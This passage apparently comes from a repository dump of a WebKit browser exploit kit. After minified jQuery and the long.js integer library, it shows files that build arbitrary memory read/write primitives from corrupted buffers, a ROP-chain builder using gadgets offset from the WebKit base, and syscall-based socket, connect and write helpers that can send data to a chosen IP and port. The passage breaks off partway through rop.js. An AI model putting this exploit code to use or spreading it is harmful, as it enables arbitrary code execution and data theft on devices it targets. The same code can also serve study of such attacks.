m.data),m.cache===!1&&(m.url=nb.test(f)?f.replace(nb,"$1_="+kb++):f+(lb.test(f)?"&":"?")+"_="+kb++)),m.ifModified&&(n.lastModified[f]&&x.setRequestHeader("If-Modified-Since",n.lastModified[f]),n.etag[f]&&x.setRequestHeader("If-None-Match",n.etag[f])),(m.data&&m.hasContent&&m.contentType!==!1||c.contentType)&&x.setRequestHeader("Content-Type",m.contentType),x.setRequestHeader("Accept",m.dataTypes[0]&&m.accepts[m.dataTypes[0]]?m.accepts[m.dataTypes[0]]+("*"!==m.dataTypes[0]?", "+ub+"; q=0.01":""):m.accepts["*"]);for(l in m.headers)x.setRequestHeader(l,m.headers[l]);if(m.beforeSend&&(m.beforeSend.call(o,x,m)===!1||2===v))return x.abort();w="abort";for(l in{success:1,error:1,complete:1})x[l](m[l]);if(e=xb(tb,m,c,x)){if(x.readyState=1,k&&p.trigger("ajaxSend",[x,m]),2===v)return x;m.async&&m.timeout>0&&(i=a.setTimeout(function(){x.abort("timeout")},m.timeout));try{v=1,e.send(t,z)}catch(y){if(!(2>v))throw y;z(-1,y)}}else z(-1,"No Transport");function z(b,c,d,h){var j,l,t,u,w,y=c;2!==v&&(v=2,i&&a.clearTimeout(i),e=void 0,g=h||"",x.readyState=b>0?4:0,j=b>=200&&300>b||304===b,d&&(u=zb(m,x,d)),u=Ab(m,u,x,j),j?(m.ifModified&&(w=x.getResponseHeader("Last-Modified"),w&&(n.lastModified[f]=w),w=x.getResponseHeader("etag"),w&&(n.etag[f]=w)),204===b||"HEAD"===m.type?y="nocontent":304===b?y="notmodified":(y=u.state,l=u.data,t=u.error,j=!t)):(t=y,!b&&y||(y="error",0>b&&(b=0))),x.status=b,x.statusText=(c||y)+"",j?q.resolveWith(o,[l,y,x]):q.rejectWith(o,[x,y,t]),x.statusCode(s),s=void 0,k&&p.trigger(j?"ajaxSuccess":"ajaxError",[x,m,j?l:t]),r.fireWith(o,[x,y]),k&&(p.trigger("ajaxComplete",[x,m]),--n.active||n.event.trigger("ajaxStop")))}return x},getJSON:function(a,b,c){return n.get(a,b,c,"json")},getScript:function(a,b){return n.get(a,void 0,b,"script")}}),n.each(["get","post"],function(a,b){n[b]=function(a,c,d,e){return n.isFunction(c)&&(e=e||d,d=c,c=void 0),n.ajax(n.extend({url:a,type:b,dataType:e,data:c,success:d},n.isPlainObject(a)&&a))}}),n._evalUrl=function(a){return n.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},n.fn.extend({wrapAll:function(a){var b;return n.isFunction(a)?this.each(function(b){n(this).wrapAll(a.call(this,b))}):(this[0]&&(b=n(a,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstElementChild)a=a.firstElementChild;return a}).append(this)),this)},wrapInner:function(a){return n.isFunction(a)?this.each(function(b){n(this).wrapInner(a.call(this,b))}):this.each(function(){var b=n(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=n.isFunction(a);return this.each(function(c){n(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){n.nodeName(this,"body")||n(this).replaceWith(this.childNodes)}).end()}}),n.expr.filters.hidden=function(a){return!n.expr.filters.visible(a)},n.expr.filters.visible=function(a){return a.offsetWidth>0||a.offsetHeight>0||a.getClientRects().length>0};var Bb=/%20/g,Cb=/\[\]$/,Db=/\r?\n/g,Eb=/^(?:submit|button|image|reset|file)$/i,Fb=/^(?:input|select|textarea|keygen)/i;function Gb(a,b,c,d){var e;if(n.isArray(b))n.each(b,function(b,e){c||Cb.test(a)?d(a,e):Gb(a+"["+("object"==typeof e&&null!=e?b:"")+"]",e,c,d)});else if(c||"object"!==n.type(b))d(a,b);else for(e in b)Gb(a+"["+e+"]",b[e],c,d)}n.param=function(a,b){var c,d=[],e=function(a,b){b=n.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=n.ajaxSettings&&n.ajaxSettings.traditional),n.isArray(a)||a.jquery&&!n.isPlainObject(a))n.each(a,function(){e(this.name,this.value)});else for(c in a)Gb(c,a[c],b,e);return d.join("&").replace(Bb,"+")},n.fn.extend({serialize:function(){return n.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=n.prop(this,"elements");return a?n.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!n(this).is(":disabled")&&Fb.test(this.nodeName)&&!Eb.test(a)&&(this.checked||!X.test(a))}).map(function(a,b){var c=n(this).val();return null==c?null:n.isArray(c)?n.map(c,function(a){return{name:b.name,value:a.replace(Db,"\r\n")}}):{name:b.name,value:c.replace(Db,"\r\n")}}).get()}}),n.ajaxSettings.xhr=function(){try{return new a.XMLHttpRequest}catch(b){}};var Hb={0:200,1223:204},Ib=n.ajaxSettings.xhr();l.cors=!!Ib&&"withCredentials"in Ib,l.ajax=Ib=!!Ib,n.ajaxTransport(function(b){var c,d;return l.cors||Ib&&!b.crossDomain?{send:function(e,f){var g,h=b.xhr();if(h.open(b.type,b.url,b.async,b.username,b.password),b.xhrFields)for(g in b.xhrFields)h[g]=b.xhrFields[g];b.mimeType&&h.overrideMimeType&&h.overrideMimeType(b.mimeType),b.crossDomain||e["X-Requested-With"]||(e["X-Requested-With"]="XMLHttpRequest");for(g in e)h.setRequestHeader(g,e[g]);c=function(a){return function(){c&&(c=d=h.onload=h.onerror=h.onabort=h.onreadystatechange=null,"abort"===a?h.abort():"error"===a?"number"!=typeof h.status?f(0,"error"):f(h.status,h.statusText):f(Hb[h.status]||h.status,h.statusText,"text"!==(h.responseType||"text")||"string"!=typeof h.responseText?{binary:h.response}:{text:h.responseText},h.getAllResponseHeaders()))}},h.onload=c(),d=h.onerror=c("error"),void 0!==h.onabort?h.onabort=d:h.onreadystatechange=function(){4===h.readyState&&a.setTimeout(function(){c&&d()})},c=c("abort");try{h.send(b.hasContent&&b.data||null)}catch(i){if(c)throw i}},abort:function(){c&&c()}}:void 0}),n.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/\b(?:java|ecma)script\b/},converters:{"text script":function(a){return n.globalEval(a),a}}}),n.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET")}),n.ajaxTransport("script",function(a){if(a.crossDomain){var b,c;return{send:function(e,f){b=n("<script>").prop({charset:a.scriptCharset,src:a.url}).on("load error",c=function(a){b.remove(),c=null,a&&f("error"===a.type?404:200,a.type)}),d.head.appendChild(b[0])},abort:function(){c&&c()}}}});var Jb=[],Kb=/(=)\?(?=&|$)|\?\?/;n.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=Jb.pop()||n.expando+"_"+kb++;return this[a]=!0,a}}),n.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(Kb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Kb.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=n.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(Kb,"$1"+e):b.jsonp!==!1&&(b.url+=(lb.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||n.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){void 0===f?n(a).removeProp(e):a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,Jb.push(e)),g&&n.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),n.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||d;var e=x.exec(a),f=!c&&[];return e?[b.createElement(e[1])]:(e=ca([a],b,f),f&&f.length&&n(f).remove(),n.merge([],e.childNodes))};var Lb=n.fn.load;n.fn.load=function(a,b,c){if("string"!=typeof a&&Lb)return Lb.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>-1&&(d=n.trim(a.slice(h)),a=a.slice(0,h)),n.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(e="POST"),g.length>0&&n.ajax({url:a,type:e||"GET",dataType:"html",data:b}).done(function(a){f=arguments,g.html(d?n("<div>").append(n.parseHTML(a)).find(d):a)}).always(c&&function(a,b){g.each(function(){c.apply(this,f||[a.responseText,b,a])})}),this},n.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){n.fn[b]=function(a){return this.on(b,a)}}),n.expr.filters.animated=function(a){return n.grep(n.timers,function(b){return a===b.elem}).length};function Mb(a){return n.isWindow(a)?a:9===a.nodeType&&a.defaultView}n.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=n.css(a,"position"),l=n(a),m={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=n.css(a,"top"),i=n.css(a,"left"),j=("absolute"===k||"fixed"===k)&&(f+i).indexOf("auto")>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),n.isFunction(b)&&(b=b.call(a,c,n.extend({},h))),null!=b.top&&(m.top=b.top-h.top+g),null!=b.left&&(m.left=b.left-h.left+e),"using"in b?b.using.call(a,m):l.css(m)}},n.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){n.offset.setOffset(this,a,b)});var b,c,d=this[0],e={top:0,left:0},f=d&&d.ownerDocument;if(f)return b=f.documentElement,n.contains(b,d)?(e=d.getBoundingClientRect(),c=Mb(f),{top:e.top+c.pageYOffset-b.clientTop,left:e.left+c.pageXOffset-b.clientLeft}):e},position:function(){if(this[0]){var a,b,c=this[0],d={top:0,left:0};return"fixed"===n.css(c,"position")?b=c.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),n.nodeName(a[0],"html")||(d=a.offset()),d.top+=n.css(a[0],"borderTopWidth",!0),d.left+=n.css(a[0],"borderLeftWidth",!0)),{top:b.top-d.top-n.css(c,"marginTop",!0),left:b.left-d.left-n.css(c,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent;while(a&&"static"===n.css(a,"position"))a=a.offsetParent;return a||Ea})}}),n.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,b){var c="pageYOffset"===b;n.fn[a]=function(d){return K(this,function(a,d,e){var f=Mb(a);return void 0===e?f?f[b]:a[d]:void(f?f.scrollTo(c?f.pageXOffset:e,c?e:f.pageYOffset):a[d]=e)},a,d,arguments.length)}}),n.each(["top","left"],function(a,b){n.cssHooks[b]=Ga(l.pixelPosition,function(a,c){return c?(c=Fa(a,b),Ba.test(c)?n(a).position()[b]+"px":c):void 0})}),n.each({Height:"height",Width:"width"},function(a,b){n.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){n.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return K(this,function(b,c,d){var e;return n.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.extend({bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)},size:function(){return this.length}}),n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var Nb=a.jQuery,Ob=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=Ob),b&&a.jQuery===n&&(a.jQuery=Nb),n},b||(a.jQuery=a.$=n),n});
5 | 


--------------------------------------------------------------------------------
/scripts/js_utils.js:
--------------------------------------------------------------------------------
 1 | _dview = null;
 2 | 
 3 | function u2d(low, hi) {
 4 |     if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 5 |     _dview.setUint32(0, hi);
 6 |     _dview.setUint32(4, low);
 7 |     return _dview.getFloat64(0);
 8 | }
 9 | 
10 | function d2u(d) {
11 |     if (!_dview) _dview = new DataView(new ArrayBuffer(16));
12 |     _dview.setFloat64(0, d);
13 |     return {
14 |         low: _dview.getUint32(4),
15 |         hi: _dview.getUint32(0)
16 |     };
17 | }
18 | 
19 | function debug_log(msg) {
20 |     $.ajax({
21 |         url: '/debug/log/',
22 |         type: 'POST',
23 |         contentType: 'text/html',
24 |         data: msg,
25 |         processData: false,
26 |         async: false
27 |     });
28 | }
29 | 
30 | function debug_bin(bin, name) {
31 |     $.ajax({
32 |         url: '/debug/bin/' + name,
33 |         type: 'POST',
34 |         contentType: 'application/octet-stream',
35 |         data: bin,
36 |         processData: false,
37 |         async: false
38 |     });
39 | }
40 | 


--------------------------------------------------------------------------------
/scripts/long.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  long.js (c) 2013 Daniel Wirtz <dcode@dcode.io>
 3 |  Released under the Apache License, Version 2.0
 4 |  see: https://github.com/dcodeIO/long.js for details
 5 | */
 6 | (function(d,g){"function"===typeof define&&define.amd?define([],g):"function"===typeof require&&"object"===typeof module&&module&&module.exports?module.exports=g():(d.dcodeIO=d.dcodeIO||{}).Long=g()})(this,function(){function d(a,b,c){this.low=a|0;this.high=b|0;this.unsigned=!!c}function g(a){return!0===(a&&a.__isLong__)}function m(a,b){var c,t;if(b){a>>>=0;if(t=0<=a&&256>a)if(c=z[a])return c;c=e(a,0>(a|0)?-1:0,!0);t&&(z[a]=c)}else{a|=0;if(t=-128<=a&&128>a)if(c=A[a])return c;c=e(a,0>a?-1:0,!1);t&&
 7 | (A[a]=c)}return c}function n(a,b){if(isNaN(a)||!isFinite(a))return b?p:k;if(b){if(0>a)return p;if(a>=B)return C}else{if(a<=-D)return l;if(a+1>=D)return E}return 0>a?n(-a,b).neg():e(a%4294967296|0,a/4294967296|0,b)}function e(a,b,c){return new d(a,b,c)}function x(a,b,c){if(0===a.length)throw Error("empty string");if("NaN"===a||"Infinity"===a||"+Infinity"===a||"-Infinity"===a)return k;"number"===typeof b?(c=b,b=!1):b=!!b;c=c||10;if(2>c||36<c)throw RangeError("radix");var t;if(0<(t=a.indexOf("-")))throw Error("interior hyphen");
 8 | if(0===t)return x(a.substring(1),b,c).neg();t=n(v(c,8));for(var e=k,f=0;f<a.length;f+=8){var d=Math.min(8,a.length-f),g=parseInt(a.substring(f,f+d),c);8>d?(d=n(v(c,d)),e=e.mul(d).add(n(g))):(e=e.mul(t),e=e.add(n(g)))}e.unsigned=b;return e}function q(a){return a instanceof d?a:"number"===typeof a?n(a):"string"===typeof a?x(a):e(a.low,a.high,a.unsigned)}Object.defineProperty(d.prototype,"__isLong__",{value:!0,enumerable:!1,configurable:!1});d.isLong=g;var A={},z={};d.fromInt=m;d.fromNumber=n;d.fromBits=
 9 | e;var v=Math.pow;d.fromString=x;d.fromValue=q;var B=4294967296*4294967296,D=B/2,F=m(16777216),k=m(0);d.ZERO=k;var p=m(0,!0);d.UZERO=p;var r=m(1);d.ONE=r;var G=m(1,!0);d.UONE=G;var y=m(-1);d.NEG_ONE=y;var E=e(-1,2147483647,!1);d.MAX_VALUE=E;var C=e(-1,-1,!0);d.MAX_UNSIGNED_VALUE=C;var l=e(0,-2147483648,!1);d.MIN_VALUE=l;var b=d.prototype;b.toInt=function(){return this.unsigned?this.low>>>0:this.low};b.toNumber=function(){return this.unsigned?4294967296*(this.high>>>0)+(this.low>>>0):4294967296*this.high+
10 | (this.low>>>0)};b.toString=function(a){a=a||10;if(2>a||36<a)throw RangeError("radix");if(this.isZero())return"0";if(this.isNegative()){if(this.eq(l)){var b=n(a),c=this.div(b),b=c.mul(b).sub(this);return c.toString(a)+b.toInt().toString(a)}return"-"+this.neg().toString(a)}for(var c=n(v(a,6),this.unsigned),b=this,e="";;){var d=b.div(c),f=(b.sub(d.mul(c)).toInt()>>>0).toString(a),b=d;if(b.isZero())return f+e;for(;6>f.length;)f="0"+f;e=""+f+e}};b.getHighBits=function(){return this.high};b.getHighBitsUnsigned=
11 | function(){return this.high>>>0};b.getLowBits=function(){return this.low};b.getLowBitsUnsigned=function(){return this.low>>>0};b.getNumBitsAbs=function(){if(this.isNegative())return this.eq(l)?64:this.neg().getNumBitsAbs();for(var a=0!=this.high?this.high:this.low,b=31;0<b&&0==(a&1<<b);b--);return 0!=this.high?b+33:b+1};b.isZero=function(){return 0===this.high&&0===this.low};b.isNegative=function(){return!this.unsigned&&0>this.high};b.isPositive=function(){return this.unsigned||0<=this.high};b.isOdd=
12 | function(){return 1===(this.low&1)};b.isEven=function(){return 0===(this.low&1)};b.equals=function(a){g(a)||(a=q(a));return this.unsigned!==a.unsigned&&1===this.high>>>31&&1===a.high>>>31?!1:this.high===a.high&&this.low===a.low};b.eq=b.equals;b.notEquals=function(a){return!this.eq(a)};b.neq=b.notEquals;b.lessThan=function(a){return 0>this.comp(a)};b.lt=b.lessThan;b.lessThanOrEqual=function(a){return 0>=this.comp(a)};b.lte=b.lessThanOrEqual;b.greaterThan=function(a){return 0<this.comp(a)};b.gt=b.greaterThan;
13 | b.greaterThanOrEqual=function(a){return 0<=this.comp(a)};b.gte=b.greaterThanOrEqual;b.compare=function(a){g(a)||(a=q(a));if(this.eq(a))return 0;var b=this.isNegative(),c=a.isNegative();return b&&!c?-1:!b&&c?1:this.unsigned?a.high>>>0>this.high>>>0||a.high===this.high&&a.low>>>0>this.low>>>0?-1:1:this.sub(a).isNegative()?-1:1};b.comp=b.compare;b.negate=function(){return!this.unsigned&&this.eq(l)?l:this.not().add(r)};b.neg=b.negate;b.add=function(a){g(a)||(a=q(a));var b=this.high>>>16,c=this.high&65535,
14 | d=this.low>>>16,l=a.high>>>16,f=a.high&65535,n=a.low>>>16,k;k=0+((this.low&65535)+(a.low&65535));a=0+(k>>>16);a+=d+n;d=0+(a>>>16);d+=c+f;c=0+(d>>>16);c=c+(b+l)&65535;return e((a&65535)<<16|k&65535,c<<16|d&65535,this.unsigned)};b.subtract=function(a){g(a)||(a=q(a));return this.add(a.neg())};b.sub=b.subtract;b.multiply=function(a){if(this.isZero())return k;g(a)||(a=q(a));if(a.isZero())return k;if(this.eq(l))return a.isOdd()?l:k;if(a.eq(l))return this.isOdd()?l:k;if(this.isNegative())return a.isNegative()?
15 | this.neg().mul(a.neg()):this.neg().mul(a).neg();if(a.isNegative())return this.mul(a.neg()).neg();if(this.lt(F)&&a.lt(F))return n(this.toNumber()*a.toNumber(),this.unsigned);var b=this.high>>>16,c=this.high&65535,d=this.low>>>16,w=this.low&65535,f=a.high>>>16,m=a.high&65535,p=a.low>>>16;a=a.low&65535;var u,h,s,r;r=0+w*a;s=0+(r>>>16);s+=d*a;h=0+(s>>>16);s=(s&65535)+w*p;h+=s>>>16;s&=65535;h+=c*a;u=0+(h>>>16);h=(h&65535)+d*p;u+=h>>>16;h&=65535;h+=w*m;u+=h>>>16;h&=65535;u=u+(b*a+c*p+d*m+w*f)&65535;return e(s<<
16 | 16|r&65535,u<<16|h,this.unsigned)};b.mul=b.multiply;b.divide=function(a){g(a)||(a=q(a));if(a.isZero())throw Error("division by zero");if(this.isZero())return this.unsigned?p:k;var b,c,d;if(this.unsigned){a.unsigned||(a=a.toUnsigned());if(a.gt(this))return p;if(a.gt(this.shru(1)))return G;d=p}else{if(this.eq(l)){if(a.eq(r)||a.eq(y))return l;if(a.eq(l))return r;b=this.shr(1).div(a).shl(1);if(b.eq(k))return a.isNegative()?r:y;c=this.sub(a.mul(b));return d=b.add(c.div(a))}if(a.eq(l))return this.unsigned?
17 | p:k;if(this.isNegative())return a.isNegative()?this.neg().div(a.neg()):this.neg().div(a).neg();if(a.isNegative())return this.div(a.neg()).neg();d=k}for(c=this;c.gte(a);){b=Math.max(1,Math.floor(c.toNumber()/a.toNumber()));for(var e=Math.ceil(Math.log(b)/Math.LN2),e=48>=e?1:v(2,e-48),f=n(b),m=f.mul(a);m.isNegative()||m.gt(c);)b-=e,f=n(b,this.unsigned),m=f.mul(a);f.isZero()&&(f=r);d=d.add(f);c=c.sub(m)}return d};b.div=b.divide;b.modulo=function(a){g(a)||(a=q(a));return this.sub(this.div(a).mul(a))};
18 | b.mod=b.modulo;b.not=function(){return e(~this.low,~this.high,this.unsigned)};b.and=function(a){g(a)||(a=q(a));return e(this.low&a.low,this.high&a.high,this.unsigned)};b.or=function(a){g(a)||(a=q(a));return e(this.low|a.low,this.high|a.high,this.unsigned)};b.xor=function(a){g(a)||(a=q(a));return e(this.low^a.low,this.high^a.high,this.unsigned)};b.shiftLeft=function(a){g(a)&&(a=a.toInt());return 0===(a&=63)?this:32>a?e(this.low<<a,this.high<<a|this.low>>>32-a,this.unsigned):e(0,this.low<<a-32,this.unsigned)};
19 | b.shl=b.shiftLeft;b.shiftRight=function(a){g(a)&&(a=a.toInt());return 0===(a&=63)?this:32>a?e(this.low>>>a|this.high<<32-a,this.high>>a,this.unsigned):e(this.high>>a-32,0<=this.high?0:-1,this.unsigned)};b.shr=b.shiftRight;b.shiftRightUnsigned=function(a){g(a)&&(a=a.toInt());a&=63;if(0===a)return this;var b=this.high;return 32>a?e(this.low>>>a|b<<32-a,b>>>a,this.unsigned):32===a?e(b,0,this.unsigned):e(b>>>a-32,0,this.unsigned)};b.shru=b.shiftRightUnsigned;b.toSigned=function(){return this.unsigned?
20 | e(this.low,this.high,!1):this};b.toUnsigned=function(){return this.unsigned?this:e(this.low,this.high,!0)};return d});
21 | 


--------------------------------------------------------------------------------
/scripts/mem_utils.js:
--------------------------------------------------------------------------------
 1 | function read64(addr) {
 2 |     var old_low = cbuf[0x14]
 3 |     var old_high = cbuf[0x15]
 4 |     cbuf[0x14] = addr.getLowBitsUnsigned()
 5 |     cbuf[0x15] = addr.getHighBitsUnsigned()
 6 |     var ret = new dcodeIO.Long(rop_buf[0], rop_buf[1], true)
 7 |     cbuf[0x14] = old_low
 8 |     cbuf[0x15] = old_high
 9 |     return ret;
10 | }
11 | 
12 | function read32(addr) {
13 |     return read64(addr).getLowBitsUnsigned()
14 | }
15 | 
16 | function read16(addr) {
17 |     return read32(addr) & 0xFFFF;
18 | }
19 | 
20 | function read8(addr) {
21 |     return read32(addr) & 0xFF;
22 | }
23 | 
24 | function read_str(addr) {
25 |     ret = ''
26 |     var c = read8(addr)
27 |     while (c != 0) {
28 |         ret = ret.concat(String.fromCharCode(c))
29 |         addr = addr.add(0x1)
30 |         c = read8(addr)
31 |     }
32 |     return ret;
33 | }
34 | 
35 | function read_data(addr, len) {
36 |     var ret = new Uint32Array(len / 4);
37 |     for (var i = 0; i < len / 4; i++) {
38 |         ret[i] = read32(addr.add(i * 4))
39 |     }
40 |     return ret;
41 | }
42 | 
43 | 
44 | function write8(addr, val) {
45 |     var old_low = cbuf[0x14]
46 |     var old_high = cbuf[0x15]
47 |     cbuf[0x14] = addr.getLowBitsUnsigned()
48 |     cbuf[0x15] = addr.getHighBitsUnsigned()
49 |     rop_buf[0] = (rop_buf & ~0xF) | (val & 0xFF)
50 |     cbuf[0x14] = old_low
51 |     cbuf[0x15] = old_high
52 | }
53 | 
54 | function write16(addr, val) {
55 |     write8(addr, val & 0xFF)
56 |     write8(addr.add(0x1), (val >> 8) & 0xFF)
57 | }
58 | 
59 | function write32(addr, val) {
60 |     write16(addr, val & 0xFFFF);
61 |     write16(addr.add(0x2), (val >> 0x10) & 0xFFFF)
62 | }
63 | 
64 | function write64(addr, val) {
65 |     write32(addr, val.getLowBitsUnsigned())
66 |     write32(addr.add(0x4), val.getHighBitsUnsigned())
67 | }
68 | 
69 | function write_str(addr, str) {
70 |     for (var i = 0; i < str.length; i++) {
71 |         write8(addr.add(i), str.charCodeAt(i))
72 |     }
73 | }
74 | 
75 | function write_data(addr, u32array) {
76 |     for (var i = 0; i < u32array.length; i++) {
77 |         write32(addr.add(i * 4), u32array[i])
78 |     }
79 | }
80 | 


--------------------------------------------------------------------------------
/scripts/network_utils.js:
--------------------------------------------------------------------------------
 1 | var AF_INET = 2
 2 | var SOCK_STREAM = 1
 3 | 
 4 | function socket() {
 5 |     var r = new RopChain()
 6 |     var ret = storage.alloc(0x4)
 7 |     r.syscall(97, AF_INET, SOCK_STREAM, 0)
 8 |     r.add('pop rdi')
 9 |     r.add(ret)
10 |     r.add('mov qword ptr [rdi], rax')
11 |     r.execute()
12 |     var ret = read32(ret)
13 |     storage.free(0x4)
14 |     return ret
15 | }
16 | 
17 | function connect_helper(fd, ip, port) {
18 |     var c = new Uint32Array(0x10);
19 |     var nums = ip.split('.')
20 |     for (var i = 0; i < 4; i++)
21 |         nums[i] = parseInt(nums[i])
22 |     c[0] |= ((port >> 0x8) & 0xFF) << 0x10 | (port) << 0x18
23 |     c[0] |= 0x2 << 0x8
24 |     c[1] = nums[3] << 24 | nums[2] << 16 | nums[1] << 8 | nums[0]
25 |     var r = new RopChain()
26 |     var ret = storage.alloc(0x4)
27 |     var sock_addr_buf = storage.alloc(0x10)
28 |     write_data(sock_addr_buf, c)
29 |     r.syscall(98, fd, sock_addr_buf, 0x10)
30 |     r.add('pop rdi')
31 |     r.add(ret)
32 |     r.add('mov qword ptr [rdi], rax')
33 |     r.execute()
34 |     var ret = read32(ret)
35 |     storage.free(0x10 + 0x4)
36 |     return ret;
37 | 
38 | }
39 | 
40 | function write(fd, addr, len) {
41 |     var r = new RopChain()
42 |     var ret = storage.alloc(0x4)
43 |     r.syscall(4, fd, addr, len);
44 |     r.add('pop rdi')
45 |     r.add(ret)
46 |     r.add('mov qword ptr [rdi], rax')
47 |     r.execute()
48 |     var ret = read32(ret)
49 |     storage.free(0x4)
50 |     return ret;
51 | }
52 | 


--------------------------------------------------------------------------------
/scripts/rop.js:
--------------------------------------------------------------------------------
  1 | VTABLE = 0x0
  2 | LIBWEBKIT = 0x1
  3 | 
  4 | function Storage() {
  5 |     this.initial_addr = null;
  6 |     this.addr = null;
  7 | 
  8 |     this.set_initial_addr = function(addr) {
  9 |         this.initial_addr = addr;
 10 |         this.addr = this.initial_addr
 11 |     }
 12 | 
 13 |     this.alloc = function(size) {
 14 |         var ret = this.addr
 15 |         if (size % 8 == 0) {
 16 |             for (var i = 0; i < size; i += 8) {
 17 |                 write64(this.addr.add(i), new dcodeIO.Long(0, 0))
 18 |             }
 19 |         } else if (size % 4 == 0) {
 20 |             for (var i = 0; i < size; i += 4) {
 21 |                 write32(this.addr.add(i), 0)
 22 |             }
 23 |         } else {
 24 |             for (var i = 0; i < size; i += 1) {
 25 |                 write8(this.addr.add(i), 0)
 26 |             }
 27 |         }
 28 |         this.addr = this.addr.add(size)
 29 |         return ret;
 30 |     }
 31 | 
 32 |     this.free = function(size) {
 33 |         this.addr = this.addr.sub(size)
 34 |     }
 35 | 
 36 |     this.reset = function() {
 37 |         this.addr = this.initial_addr;
 38 |     }
 39 | }
 40 | 
 41 | function gadget(module, offset, machine) {
 42 |     this.addr = function() {
 43 |         return this.get_module_base().add(offset);
 44 |     }
 45 | 
 46 |     this.get_module_base = function() {
 47 |         if (module == VTABLE)
 48 |             return vtable_ptr;
 49 |         if (module == LIBWEBKIT)
 50 |             return webkit_base_addr;
 51 |         else return 0;
 52 |     }
 53 | 
 54 |     if (machine) {
 55 |         this.machine = machine;
 56 |     }
 57 | }
 58 | 
 59 | function check(ptr, array) {
 60 | 
 61 | }
 62 | 
 63 | function RopChain() {
 64 |     this.rop_chain = [];
 65 | 
 66 |     this.add = function(instr) {
 67 |         if (typeof(instr) === "string") {
 68 |             var gadget = gadgets[instr];
 69 |             if (typeof(gadget) === 'undefined') {
 70 |                 throw "Gadget " + instr + " was not found";
 71 |             }
 72 |             if (typeof(gadget.machine) != "undefined") {
 73 |                 var tmp = [];
 74 |                 var valid = true;
 75 |                 for (var i = 0; i < gadget.machine.length; i++) {
 76 |                     if ((tmp[tmp.length] = read8(gadget.addr().add(i))) != gadget.machine[i]) valid = false;
 77 |                 }
 78 |                 var ret = read8(gadget.addr().add(gadget.machine.length));
 79 |                 if (ret != 0xc3) valid = false;
 80 |                 if (!valid) {
 81 |                     throw "Opcode invalid in " + instr + " got " + tmp.reduce(function(p, c) {
 82 |                         return p + c.toString(16) + ' '
 83 |                     }, "") + ret.toString(16)
 84 |                 }
 85 |             }
 86 |             this.rop_chain.push(gadget.addr().getLowBitsUnsigned())
 87 |             this.rop_chain.push(gadget.addr().getHighBitsUnsigned())
 88 |         }
 89 |         // If we are only writing a 32bit integer, makes it easier
 90 |         else if (typeof(instr) === "number") {
 91 |             this.rop_chain.push(instr)
 92 |             this.rop_chain.push(0)
 93 |         } else {
 94 |             this.rop_chain.push(instr.getLowBitsUnsigned())
 95 |             this.rop_chain.push(instr.getHighBitsUnsigned())
 96 |         }
 97 |     }
 98 | 
 99 |     this.syscall = function(num, arg1, arg2, arg3, arg4, arg5, arg6) {
100 |         this.add("pop rax");
101 |         this.add(num)
102 |         this.add("pop rdi");
103 |         this.add(typeof(arg1) !== "undefined" ? arg1 : 0)
104 |         this.add("pop rsi");
105 |         this.add(typeof(arg2) !== "undefined" ? arg2 : 0)
106 |         this.add("pop rdx");
107 |         this.add(typeof(arg3) !== "undefined" ? arg3 : 0)
108 |         this.add("pop rcx");
109 |         this.add(typeof(arg4) !== "undefined" ? arg4 : 0)
110 |         this.add("pop r8");
111 |         this.add(typeof(arg5) !== "undefined" ? arg5 : 0)
112 |         this.add("pop r9");
113 |         this.add(typeof(arg6) !== "undefined" ? arg6 : 0)
